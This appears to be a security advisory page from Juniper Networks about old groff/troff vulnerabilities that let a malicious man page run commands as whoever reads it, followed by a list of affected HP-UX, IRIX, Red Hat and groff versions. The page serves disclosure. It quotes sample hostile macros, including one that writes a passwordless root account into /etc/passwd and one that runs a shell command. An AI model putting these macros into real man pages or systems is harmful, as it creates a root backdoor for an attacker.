• Product Information
• Security Products Overview
• Juniper Networks ISG Series
• IDP Demo
• Product Poster & Z-Card 

Title: Groff/Troff Malicious Manpage Vulnerabilities

Severity: MODERATE

Description:

Versions of GNU groff prior to release 1.11a and standard troff contain vulnerabilities that can possibly lead to a local root compromise if the conditions are right and circumstances are somehow met. A malicious user can, in theory, embed t/g|roff macros inside of man pages that will execute with the uid of the unknowing reader.

A groff example of this is a manpage that, once read as root, will add another user to /etc/passwd with uid0 and no password. The macro for this looks like this:

.opena stream /etc/passwd .write stream r00t::0:0::/:/bin/sh

There are groff other macros that pose a threat if somehow put in a man page that root would view:

To execute a command and display the output:

.pso ls -l /root

While troff has fixed some of these, or at least disabled them by default, old vulnerabilities still exist (such as..):

.sy and .pi

which respectively execute commands a la system() and pipe output to a program.

These problems have quietly existed and been known about for years and it is questionable whether this is even a true vulnerability or not. When permissions are set properly, exploiting this should _not_ be possible, which makes this problem nothing more than an obscure backdoor at best.

Affected Products:

• GNU groff 1.11.0a
• HP HP-UX 10.0.0
• HP HP-UX 11.0.0
• RedHat Linux 5.2.0 i386
• SGI IRIX 5.2.0
• SGI IRIX 5.3.0
• SGI IRIX 6.0.0
• SGI IRIX 6.0.1
• SGI IRIX 6.1.0
• SGI IRIX 6.2.0
• SGI IRIX 6.3.0
• SGI IRIX 6.4.0
• SGI IRIX 6.5.0
• SGI IRIX 6.5.1
• SGI IRIX 6.5.3

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.